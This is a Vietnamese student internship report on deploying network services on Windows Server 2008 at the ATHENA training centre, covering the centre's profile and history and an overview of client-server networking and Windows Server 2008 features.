Báo Cáo Cuối kỳ CNTT ATHENA

-1-
SVTH: Nguyễn Huỳnh Hướng
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH
MẠNG QUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
CUỐI KỲ
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC DỊCH VỤ
MẠNG TRÊN WINDOWS SERVER 2008
Sinh viên thực hiện : Nguyễn Huỳnh Hƣớng
MSSV : 111C650047
Lớp : CD11TH02
GVHD : Võ Đỗ Thắng
TP. Hồ Chí Minh, Tháng 4 năm 2014.

-2-
LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ,
giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời gian từ
khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự quan tâm, giúp
đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc nhất, em xin gửi đến quý
Thầy Cô ở Khoa Công Nghệ Thông Tin - Trường Đại Học Mở Thành Phố Hồ Chí Minh
đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho
chúng em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa đã
tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là rất hữu ích
đối với sinh viên ngành Công Nghệ Thông Tin.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em
qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói chuyện, thảo
luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy thì em nghĩ bài báo cáo
này của em rất khó có thể hoàn thiện được. Một lần nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 3 tháng. Bước đầu đi vào thực tế,
tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không tránh khỏi
những thiếu sót là điều chắc chắn, em rất mong nhận được những ý kiến đóng góp quý
báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức của em trong lĩnh vực này
được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và
Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp
của mình là truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng.

-3-
Mục Lục
CHƢƠNG I. CÔNG VIỆC THỰC TẬP..............................................................................................6
1. Giới Thiệu Doanh Nghiệp Thực Tập – Trung Tâm Quản Trị Mạng và An Ninh Mạng Quốc
Tế ATHENA............................................................................................................................................6
1.1. Trụ sở và các chi nhánh..........................................................................................................7
a. Trụ sở chính ..............................................................................................................................7
b. Cơ sở tại TPHCM .....................................................................................................................7
1.2. Quá trình hình thành và phát triển.......................................................................................7
1.3. Cơ cấu tổ chức.......................................................................................................................10
1.4. Các khóa học của Trung Tâm..............................................................................................11
a. Các khóa học dài hạn ..............................................................................................................11
b. Các khóa học ngắn hạn ...........................................................................................................11
c. Các sản phẩm khác..................................................................................................................12
d. Cơ sở hạ tầng ..........................................................................................................................12
e. Các dịch vụ hổ trợ...................................................................................................................12
1.5. Khách hàng............................................................................................................................12
1.6. Đối tác ....................................................................................................................................13
2. Các Nhiệm Vụ Và dịch Vụ Của Bộ Phận Thực Tập..................................................................13
3. Công Việc Và Nhiệm Vụ Đƣợc Phân Công ................................................................................13
4. Thời Gian Thực Tập.....................................................................................................................13
CHƢƠNG II. NỘI DUNG THỰC TẬP ..............................................................................................14
1. Nhiệm Vụ Đƣợc Giao....................................................................................................................14
2. Kiến Thức Cần Tìm Hiểu.............................................................................................................14
2.1. Giải pháp mạng doanh nghiệp.............................................................................................14
a. Giới thiệu về mạng doanh nghiệp ...........................................................................................14
b. Các thành phần công nghệ trong mạng doanh nghiệp ............................................................14
2.2. Windows Sever 2008.............................................................................................................15
a. Giới thiệu về mô hình Client – Sever......................................................................................15
b. Giới thiệu về Windows Sever .................................................................................................18
3. Quá Trình Làm Việc Và Kiến Thức............................................................................................22
3.1. Làm việc với Windows Sever trên môi trƣờng máy ảo VMWare ....................................22
a. Cài đặt và cấu hình cho máy chủ Windows Sever 2008.........................................................23

-4-
b. Khởi tạo cấu hình đầu tiên cho máy chủ Sever 2008..............................................................32
c. Cài đặt dịch vụ DNS ...............................................................................................................42
d. Dịch vụ DHCP ........................................................................................................................52
e. Cấu hình Web Sever IIS..........................................................................................................65
f. Mail Sever...............................................................................................................................72
g. Kết nối VPN............................................................................................................................86
3.2. Làm việc với Windows Sever 2008 trên máy chủ ảo VPS...............................................106
a. Giới thiệu về Máy chủ ảo VPS .............................................................................................106
b. Mail sever trên máy chủ ảo VPS...........................................................................................108
c. Kết nối VPN thông qua máy chủ ảo VPS .............................................................................118
3.3. Bảo Mật Windows...............................................................................................................139
a. Khai thác lỗ hổng trên Windows XP với mả lỗi MS10_042.................................................139
b. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004.........................................................146
c. Khai thác lỗ hổng trên Win XP với Adobe Reader 9.X........................................................153
d. Khai thác lỗ hỏng trên Win XP với mã lỗi MS12_027.........................................................159
4. Các Kết Quả Đạt Đƣợc...........................................................................................................168
5. Kinh Nghiệm Thực Tế............................................................................................................168
6. Hoàn Thiện Bản Thân ............................................................................................................168
7. Các Kiến Thức Nhận Đƣợc....................................................................................................169
CHƢƠNG III. KẾT LUẬN..............................................................................................................169
CHƢƠNG IV. TÀI LIỆU THAM KHẢO ......................................................................................170

-5-
LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với
mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi
thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí…
Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp
phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự
phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói
riêng cũng như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông
tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có
thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho
phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng
máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự
phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server
2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên
Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho
Windows Server 2008 hoạt động một cách trơn tru.
Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công
nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt
mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng
Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà
nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các
chính phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận
tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý
báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm
vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây
dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.

-6-
CHƢƠNG I.CÔNG VIỆC THỰC TẬP
1. Giới Thiệu Doanh Nghiệp Thực Tập – Trung Tâm Quản Trị Mạng và An
Ninh Mạng Quốc Tế ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết
tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép
kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng
11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING
NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào
công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung
chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI ,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp
dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn
nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và
bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở
dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy
ra sự cố máy tính.

-7-
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành
như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền
Thông các tỉnh, bưu điện các tỉnh,…
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi
công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học
ViệnAn Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn
thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1.1. Trụ sở và các chi nhánh
a. Trụ sở chính
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041.
Hotline: 0943 23 00 99 .
b. Cơ sở tại TPHCM
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801 .
Hotline: 0943 20 00 88.
1.2. Quá trình hình thành và phát triển
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ
thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh
đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ

-8-
đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ
ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là
vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là
giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó
Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh
mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính
gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền
Nam.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ
thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các
chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật
web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp
thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như
cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung,
các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải
pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại
Đà Nẵng.

-9-
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng
viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công
nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính
sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh
nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên,
cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó
khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên
sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn
Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn
này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục
sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ
phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước
chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai
đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đãgiúp ông Thắng vượt
qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm
đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của
mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng
hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp,
trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã
hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

-10-
1.3. Cơ cấu tổ chức
Hình 1.3.1: Cơ Cấu Tổ Chức

-11-
1.4. Các khóa học của Trung Tâm
a. Các khóa học dài hạn
Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork
security Technician.
Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
b. Các khóa học ngắn hạn
Khóa quản tri mạng
Quản trị mạng Microsoft căn bản ACBN .
Phần cứng máy tính, laptop, server .
Quản trị hệ thống mạng Microsoft MCSA Security.
Quản trị mạng Microsoft nâng cao MCSE.
Quản trị window Vista .
Quản trị hệ thống Window Server 2008, 2012.
Lớp Master Exchange Mail Server.
Quản trị mạng quốc tế Cissco CCNA.
Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng
Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart.
Lập trình web với Php và MySQL.
Bảo mật mạng quốc tế ACNS.
Hacker mũ trắng .
Athena Mastering Firewall Security.
Bảo mật website.

-12-
c. Các sản phẩm khác.
Chuyên đề thực hành sao lưu và phục hồi dữ liệu.
Chuyên đề thực hành bảo mật mạng Wi_Fi.
Chuyên đề Ghost qua mạng.
Chuyên đề xây dựng và quản trị diễn đàn.
Chuyên đề bảo mật dữ liệu phòng chống nội gián.
Chuyên đề quản lý tài sản công nghệ thông tin .
Chuyên đề kỹ năng thương mại điện tử.
d. Cơ sở hạ tầng
Thiết bị đầy đủ và hiện đại.
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát.
e. Các dịch vụ hổ trợ
Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
Giới thiệu việc làm cho mọi học viên.
Thực tập có lương cho học viên khá giỏi.
Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng.
Hỗ trợ thi Chứng chỉ Quốc tế.
1.5. Khách hàng
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các
cán bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

-13-
1.6. Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp
nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng
cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính…
2. Các Nhiệm Vụ Và dịch Vụ Của Bộ Phận Thực Tập
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ
Triển khai lắp đặt hệ thống mạng.
Bảo trì hệ thống mạng.
Tư vấn hỗ trợ quản trị hệ thống mạng.
3. Công Việc Và Nhiệm Vụ Đƣợc Phân Công
Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
Triển khai các dịch vụ mạng trên Windows Server 2008.
Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.
4. Thời Gian Thực Tập
Từ ngày 17/2/2014 đến 17/4/2014

-14-
CHƢƠNG II. NỘI DUNG THỰC TẬP
1. Nhiệm Vụ Đƣợc Giao
Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
Triển khai các dịch vụ mạng trên Windows Server 2008.
2. Kiến Thức Cần Tìm Hiểu
2.1. Giải pháp mạng doanh nghiệp
a. Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự chọn lựa
cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch
vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý
đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông tin
(CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác nhau về quản
trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống được kiểm soát tốt sẽ làm
giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như độ tin cậy của hệ thống.
b. Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công
nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ thống
và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng. Vậy làm thế

-15-
nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu hạn chế, có thể tiếp
cận được với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.
2.2. Windows Sever 2008
a. Giới thiệu về mô hình Client – Sever
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào các máy
trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không cung cấp cho
bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì ngạc nhiên khi họ
thường có vấn đề với việc truy cập vào máy trạm, bị mất dữ liệu do virus, spyware hay
phải trải nghiệm việc internet bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer
là đủ khi bạn chỉ có một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6
người sử dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là an
ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá nhân và nhóm,
có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu trữ trên mạng, ngăn
chặn người sử dụng trái phép truy cập tài liệu mà họ không nên xem. Ví dụ, trong Folder
chung thì group ketoan và group nhansu có quyền truy cập của nhân viên…

-16-
Hinh2.2.1: Mô hình NTFS Permission
Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị
nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song song, sự
mất mát của một trong những nguồn cung cấp điện không ảnh hưởng đến hoạt động hệ
thống bình thường. Cũng vậy với hệ thống lưu trữ của máy chủ. Không giống như một
máy tính để bàn trung bình có sử dụng một ổ cứng duy nhất, một máy chủ sẽ thường sử
dụng nhiều ổ đĩa cứng làm việc trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc
một sự gián đoạn trong quy trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ
đĩa cứng hot swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng
cho phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra,
kể từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm của
người dùng không giữa ngày làm việc, nhân viên có thể truy cập các tập tin tương tự từ
máy trạm khác.

-17-
Tập trung lƣu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất cả
người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ bàn làm
việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:
Tập trung lưu trữ dữ liệu ( RAID Array )
-Network Attached Storage (NAS) thiết bị
-Tháp đĩa CD / DVD
-Máy in và máy chủ Fax
Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là
khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt, cập nhật,
phần mềm chống virus được cài đặt trên hệ thống của bạn là một điều cần thiết. Trong
một văn phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì riêng. Bất cứ điều
gì nhiều hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực sự. Trong những trường
hợp này, một gói phần mềm chống virus kết hợp máy trạm và bảo vệ chống virus máy
chủ vào một giải pháp duy nhất có ý nghĩa hơn.
Sao lƣu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một cách
thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được lưu trữ tại một
địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh chóng. Vì vậy, bạn sẽ
không bao giờ cần phải lo lắng về những dữ liệu được lưu trữ trên những gì máy trạm
như bạn làm trong một mạng peer-to-peer. Ngày nay, hầu hết các loại phương tiện truyền
thông có thể được sử dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa
CD, DVD, lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là
chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu
cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu
của bạn, bất kỳ trong số này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn
có ít nhất một bản sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.

-18-
b. Giới thiệu về Windows Sever
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới thời
điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và dịch vụ Web
thế hệ mới. Với Windows Server 2008, bạn có thể phát triển, cung cấp và quản lý các trải
nghiệm người dùng và ứng dụng phong phú, đem tới một hạ tầng mạng có tính bảo mật
cao, và tăng cường hiệu quả về mặt công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều hành
Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị và những cải
tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới, công nghệ ảo hóa, tính bảo
mật tăng cường và các tiện ích quản lý giúp tiết kiệm thời gian, giảm bớt các chi phí, và
đem tới một nền tảng vững chắc cho hạ tầng Công nghệ Thông tin (CNTT) của bạn.
Nền tảng chắc chắn dành cho doanh nghiệp
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu cầu về ứng
dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và quản lý. Thành phần
mới Server Manager cung cấp một console quản lý hợp nhất, đơn giản hóa và sắp xếp
một cách hợp lý việc cài đặt, cấu hình và quản lý liên tục cho máy chủ. Windows
PowerShell, một shell mới kiểu dòng lệnh, giúp quản trị viên tự động hóa các tác vụ
thường trình về quản trị hệ thống trên nhiều máy chủ. Windows Deployment Services
đem tới một phương tiện bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều
hành này qua các bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover
Clustering của Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên
bản 6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load Balancing
khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những người có hiểu biết chung
nhất về CNTT.
Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt các
vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà không cần giao
diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng nghĩa với việc giảm thiểu

-19-
công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt các bề mặt tấn công. Sản phẩm cũng
cho phép nhân viên CNTT xây dựng đặc tả tùy theo các vai trò máy chủ cần hỗ trợ.
Tích hợp Công Nghệ Ảo hóa
Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ trên
nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào phần cứng máy chủ bằng
cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng biệt chạy trên một máy vật
lý duy nhất. Cũng có thể chạy song song nhiều hệ điều hành như Windows, Linux và các
hệ điều hành khác một cách hiệu quả trên một máy chủ duy nhất. Với Hyper – V và các
chính sách cấp phép đơn giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi
phí và ảo hóa một cách dễ dàng hơn bao giờ hết.
Hình 2.2.2: Mô Hình Ảo Hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008, các
ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services Gateway và Terminal
Services RemoteApp cho phép dễ dàng truy cập từ xa tới các chương trình chuẩn hoạt
động trên nền Windows từ bất cứ vị trí nào bằng cách chạy chương trình trên một máy
chủ đầu cuối thay vì chạy trực tiếp trên một máy trạm mà không cần tới một mạng riêng
ảo (VPN) phức tạp.

-20-
Đƣợc xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS 7.0),
một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển và lưu trữ các
ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao quan trọng đối với nền
tảng Web IIS 7.0 bao gồm một kiến trúc được thành phần hóa để đem tới khả năng linh
hoạt và kiểm soát cao hơn. II.7.0 cũng cung cấp các khả năng quản lý được đơn giản hóa,
khả năng khắc phục sự cố mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả
năng mở rộng toàn diện.
Internet Information Server (IIS) 7.0 cùng với .NET Framework 3.0 cung cấp một
nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ liệu, cho phép họ
hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS 7.0 còn đóng vai trò trung
tâm trong việc hợp nhất các công nghệ nền tảng Web của Microsoft – ASP.NET, các dịch
vụ Web của Windows Communication Foudation, và Windows Sharepoint Services.
Hình 2.2.3: Giao diện IIS Manager
Bảo mật cao
